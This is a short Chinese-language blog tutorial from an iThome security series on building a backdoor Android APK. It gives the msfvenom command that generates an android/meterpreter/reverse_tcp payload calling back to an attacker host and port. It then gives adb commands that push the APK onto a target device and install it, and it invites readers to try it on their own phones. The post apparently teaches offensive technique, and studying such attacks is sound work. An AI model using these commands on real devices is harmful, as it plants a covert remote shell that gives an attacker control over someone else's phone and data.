iT邦幫忙

第 12 屆 iThome 鐵人賽

DAY 21
1
Security

漏洞挖起來系列 第 21

[Day21]客製注入後門APK

  • 分享至 

  • xImage
  •  

先前提到很多進入點,然後可以透過各種進入點注入進去。
這邊要提的是 Reverse shell,用得好可以做成後門(?)
當設備在防火牆或網路安全產品保護之內時,有機會透過 Reverse shell 傳送 shell 命令而達到後門的效果。

我們可以利用 Metasploit 產生 ReverseShell:

  1. 客製 ReverseShell APK
    msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=9999 -f raw > /root/ReverseShell.apk

  2. 透過進入點將 APK 注入目標,並且執行
    透過 SD card 注入:
    adb devices
    adb push ReverseShell.apk / sdcard
    adb install ReverseShell.apk

  3. 靜待執行後,進一步取得該目標的執行權限
    https://ithelp.ithome.com.tw/upload/images/20201005/20103647DgUeAPPQv7.png

有興趣的大家可以利用自己的安卓手機連線區域,下載客製 APK 玩看看~
參考實作:https://fred-zone.blogspot.com/2010/08/reverse-ssh-tunnel.html


上一篇
[Day20]Android APP 解壓縮
下一篇
[Day22]前輩的連網競賽分享
系列文
漏洞挖起來31
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言